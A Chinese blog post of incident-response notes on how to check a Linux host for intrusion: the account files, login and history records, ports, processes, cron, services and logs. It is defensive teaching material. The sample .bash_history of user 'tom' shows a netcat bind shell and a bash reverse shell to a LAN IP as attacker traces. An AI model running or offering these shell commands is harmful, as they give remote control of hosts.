应急响应基础笔记(二)——应急响应之Linux入侵排查

(1)账号安全

1、用户信息文件:/etc/passwd


 
  1. root: x: 0 : 0 :root :/root :/bin/bash
  2. 用户名:密码:用户ID:组ID:用户说明:家目录:登陆之后shell
  3. 注意:无密码只允许本机登陆,远程不允许登陆

2、影子文件:/etc/shadow


 
  1. root:$6$dIEKcGV4PJpr6kGu$jSpNY9SGXkkE3XakM4neFh24UT6G3mB0OCWV3ciTgmtntVEKFZ3Zc5BU69cLXqSBllz/JxA2YRC77xCG9A5YP/: 17966: 0: 99999: 7:::
  2. 用户名:加密密码:密码最后一次修改日期:两次密码的修改时间间隔:密码有效期:密码修改到期到的警告天数:密码过期之后的宽限天数:账号失效时间:保留

3、who:查看当前登录用户(tty本地登录,pts远程登录)

       w:查看系统信息,某一时刻用户的行为;

       uptime:查看登录多久,多少用户,负载;


 
  1. [root@redhat 桌面]# who
  2. root tty1 2019 -04 -15 01: 38 (: 0)
  3. root pts/ 0 2019 -05 -20 13: 05 (: 0.0)
  4. root pts/ 3 2019 -05 -20 14: 16 (: 0.0)
  5. root pts/ 10 2019 -07 -30 14: 18 (: 0.0)
  6. [root@redhat 桌面]# w
  7. 14: 22: 54 up 6: 43, 4 users, load average: 0.00, 0.01, 0.00
  8. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  9. root tty1 : 0 15Apr19 106days 1: 06 1: 06 /usr/bin/Xorg :
  10. root pts/ 0 : 0.0 20May19 71days 0.14s 0.08s bash
  11. root pts/ 3 : 0.0 20May19 71days 0.39s 0.39s /bin/bash
  12. root pts/ 10 : 0.0 14: 18 0.00s 0.42s 0.20s w
  13. [root@redhat 桌面]# uptime
  14. 14: 22: 59 up 6: 43, 4 users, load average: 0.00, 0.01, 0.00

4、入侵排查


 
  1. 1、查询特权用户特权用户(uid 为 0)
  2. [root@redhat 桌面] # awk -F: '$3==0{print $1}' /etc/passwd
  3. root
  4. yaoyao
  5. 2、查询可以远程登录的帐号信息
  6. [root@redhat 桌面] # awk '/\$1|\$6/{print $1}' /etc/shadow
  7. root:$6$dIEKcGV4PJpr6kGu$jSpNY9SGXkkE3XakM4neFh24UT6G3mB0OCWV3ciTgmtntVEKFZ3Zc5BU69cLXqSBllz/JxA2YRC77xCG9A5YP/: 17966: 0: 99999: 7:::
  8. yaoyao2:$6$EUXxnIJY$28gZzQb8LU2FXHAy26qiJsIItl0N3Vuh0smJiGvBB8fDcWj2sAYugGNpvHziwfqXIo8UojVhr4SPEKD7ZWO.s 0: 17973: 0: 99999: 7:::
  9. tangyan:$6$e.JWZKLS$v8uDzLjYgET0cF8Y2zfdcz6f85k1aP8NY0sYPoYDRx5gaxJ1ELQGjeXKFmgIF9nK9ovRJHi/rSqUnplubMKFp/: 17986: 0: 99999: 7:::
  10. xiaoqi:$6$f8XiLhMA$4dTZ4vGJjwKK.Zxc/UI2Ch3UnWB0Y9zdYpN2ZUtbtMdFkRVivoBm09KMX9XMHGqV7v/G39cvRddu0Fuqf3hZf1: 17986: 0: 99999: 7:::
  11. 3、除root帐号外,其他帐号是否存在sudo权限。如非管理需要,普通帐号应删除sudo权限
  12. [root@redhat 桌面] # more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"
  13. tom ALL=(ALL) NOPASSWD:ALL
  14. 4、禁用或删除多余及可疑的帐号
  15. usermod -L user 禁用帐号,帐号无法登录,/etc/shadow第二栏为!开头
  16. userdel user 删除user用户
  17. userdel -r user 将删除user用户,并且将/home目录下的user目录一并删除

(2)历史命令

1、通过.bash_history查看帐号执行过的系统命令;


 
  1. [root@redhat ~] # more .bash_history
  2. sh neicun.sh
  3. sh get-mac.sh
  4. sh act-ip.sh
  5. vim #!/bin/bash
  6. vim getarp.sh
  7. arping -c 2 -w 1 192.168. 37.2
  8. arping -c 2 -w 1 192.168. 37.2 -I eth1
  9. ifconfig

2、root的历史命令:history


 
  1. [root@redhat ~] # history
  2. ......
  3. 529 awk -F: '$3==0{print $1}' /etc/passwd
  4. 530 awk '/\$1|\$6/{print $1}' /etc/shadow
  5. 531 more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"
  6. 532 ls
  7. 533 cd /root
  8. 534 ls
  9. 535 ls -la
  10. 536 vim .bash_history
  11. 537 more .bash_history
  12. 538 history

3、打开/home各帐号目录下的.bash_history,查看普通帐号的历史命令;


 
  1. [root@redhat ~] # more /home/tom/.bash_history
  2. who am i
  3. whoami
  4. bin/dash
  5. /bin/dash
  6. exit
  7. whoami
  8. pwd
  9. whoami
  10. nc -nvlp 8080 -t -e /bin/bash
  11. bash -i >& /dev/tcp /192.168.37.131/ 8080 0>& 1

4、历史操作命令的清除:history -c

但此命令并不会清除保存在文件中的记录,因此需要手动删除.bash_profile文件中的记录。

(3)检查异常端口

1、使用netstat 网络连接命令,分析可疑端口、IP、PID


 
  1. [root@redhat ~] # netstat -pantu
  2. Active Internet connections (servers and established)
  3. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  4. tcp 0 0 0. 0. 0. 0 : 111 0. 0. 0. 0 :* LISTEN 1971/rpcbind
  5. tcp 0 0 0. 0. 0. 0 : 22 0. 0. 0. 0 :* LISTEN 2236/sshd

2、查看PID对应进程文件路径


 
  1. [root@redhat ~] # ls -l /proc/2236/exe
  2. lrwxrwxrwx. 1 root root 0 730 14 : 50 /proc/ 2236/exe -> /usr/sbin /sshd

(4)检查异常进程

使用ps命令,分析进程


 
  1. [root@redhat ~] # ps aux
  2. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
  3. root 1 0. 0 0. 2 19360 1280 ? Ss 07: 39 0: 05 /sbin/init
  4. root 2 0. 0 0. 0 0 0 ? S 07: 39 0: 00 [kthreadd]
  5. root 3 0. 0 0. 0 0 0 ? S 07: 39 0: 00 [migration/ 0]

(5) 检查定时任务

1、利用crontab创建计划任务

基本命令:

  • crontab -l :列出某个用户cron服务的详细内容
  • Tips:默认编写的crontab文件会保存在 (/var/spool/cron/用户名 例如: /var/spool/cron/root
  • crontab -r 删除每个用户cront任务(谨慎:删除所有的计划任务)
  • crontab -e 使用编辑器编辑当前的crontab文件

如:*/1 * * * * echo "hello world" >> /tmp/test.txt 每分钟写入文件

2、利用anacron实现异步定时任务调度

使用案例:

  • 每天运行 /home/backup.sh脚本: vi /etc/anacrontab @daily 10 example.daily /bin/bash /home/backup.sh

入侵排查

重点关注以下目录中是否存在恶意脚本


 
  1. /var/spool/cron/*
  2. /etc/crontab
  3. /etc/cron.d/*
  4. /etc/cron.daily/*
  5. /etc/cron.hourly/*
  6. /etc/cron.monthly/*
  7. /etc/cron.weekly/
  8. /etc/anacrontab
  9. /var/spool/anacron/*

(6) 检查服务

服务自启动

第一种修改方法:


 
  1. chkconfig [--level 运行级别] [独立服务名] [ on| off]
  2. chkconfig –level 2345 httpd on 开启自启动
  3. chkconfig httpd on (默认level是 2345

第二种修改方法:


 
  1. 修改/etc/re.d/rc.local 文件
  2. 加入 /etc/ init.d/httpd start

第三种修改方法:

使用ntsysv命令管理自启动,可以管理独立服务和xinetd服务。

入侵排查

1、查询已安装的服务:

RPM包安装的服务


 
  1. chkconfig -- list 查看服务自启动状态,可以看到所有的RPM包安装的服务
  2. ps aux | grep crond 查看当前服务
  3. 系统在 35级别下的启动项
  4. 中文环境
  5. chkconfig -- list | grep "3:启用\|5:启用"
  6. 英文环境
  7. chkconfig -- list | grep "3:on\|5:on"

源码包安装的服务


 
  1. 查看服务安装位置 ,一般是在/user/local/
  2. service httpd start
  3. 搜索/etc/rc.d/ init.d/ 查看是否存在

1.8 检查异常文件

1、查看敏感目录,如/tmp目录下的文件,同时注意隐藏文件夹,以“..”为名的文件夹具有隐藏属性

2、得到发现WEBSHELL、远控木马的创建时间,如何找出同一时间范围内创建的文件?

​ 可以使用find命令来查找,如 find /opt -iname "*" -atime 1 -type f 找出 /opt 下一天前访问过的文件

3、针对可疑文件可以使用stat进行创建修改时间。

1.9 检查系统日志

日志默认存放位置:/var/log/

查看日志配置情况:more /etc/rsyslog.conf

日志文件说明
/var/log/cron记录了系统定时任务相关的日志
/var/log/cups记录打印信息的日志
/var/log/dmesg记录了系统在开机时内核自检的信息,也可以使用dmesg命令直接查看内核自检信息
/var/log/mailog记录邮件信息
/var/log/message记录系统重要信息的日志。这个日志文件中会记录Linux系统的绝大多数重要信息,如果系统出现问题时,首先要检查的就应该是这个日志文件
/var/log/btmp记录错误登录日志,这个文件是二进制文件,不能直接vi查看,而要使用lastb命令查看
/var/log/lastlog记录系统中所有用户最后一次登录时间的日志,这个文件是二进制文件,不能直接vi,而要使用lastlog命令查看
/var/log/wtmp永久记录所有用户的登录、注销信息,同时记录系统的启动、重启、关机事件。同样这个文件也是一个二进制文件,不能直接vi,而需要使用last命令来查看
/var/log/utmp记录当前已经登录的用户信息,这个文件会随着用户的登录和注销不断变化,只记录当前登录用户的信息。同样这个文件不能直接vi,而要使用w,who,users等命令来查询
/var/log/secure记录验证和授权方面的信息,只要涉及账号和密码的程序都会记录,比如SSH登录,su切换用户,sudo授权,甚至添加用户和修改用户密码都会记录在这个日志文件中

日志分析技巧:


 
  1. 1、定位有多少IP在爆破主机的root帐号:
  2. grep "Failed password for root" /var/ log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
  3. 定位有哪些IP在爆破:
  4. grep "Failed password" /var/ log/secure| grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c
  5. 爆破用户名字典是什么?
  6. grep "Failed password" /var/ log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c| sort -nr
  7. 2、登录成功的IP有哪些:
  8. grep "Accepted " /var/ log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
  9. 登录成功的日期、用户名、IP:
  10. grep "Accepted " /var/ log/secure | awk '{print $1,$2,$3,$9,$11}'
  11. 3、增加一个用户kali日志:
  12. Jul 10 00: 12: 15 localhost useradd[ 2382]: new group: name=kali, GID= 1001
  13. Jul 10 00: 12: 15 localhost useradd[ 2382]: new user: name=kali, UID= 1001, GID= 1001, home= /home/kali
  14. , shell= /bin/bash
  15. Jul 10 00: 12: 58 localhost passwd: pam_unix(passwd:chauthtok): password changed for kali
  16. #grep "useradd" /var/log/secure
  17. 4、删除用户kali日志:
  18. Jul 10 00: 14: 17 localhost userdel[ 2393]: delete user 'kali'
  19. Jul 10 00: 14: 17 localhost userdel[ 2393]: removed group 'kali' owned by 'kali'
  20. Jul 10 00: 14: 17 localhost userdel[ 2393]: removed shadow group 'kali' owned by 'kali'
  21. # grep "userdel" /var/log/secure
  22. 5、su切换用户:
  23. Jul 10 00: 38: 13 localhost su: pam_unix(su-l:session): session opened for user good by root(uid= 0)
  24. sudo授权执行:
  25. sudo -l
  26. Jul 10 00: 43:09 localhost sudo: good : TTY=pts/ 4 ; PWD= /home/good ; USER=root ; COMMAND= /sbin/shutdown -r now

原文参考链接:https://blog.csdn.net/qq_23936389/article/details/83511323

参与评论 您还未登录,请先 登录 后发表或查看评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:大白 设计师:CSDN官方博客 返回首页

打赏作者

haha13l4

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值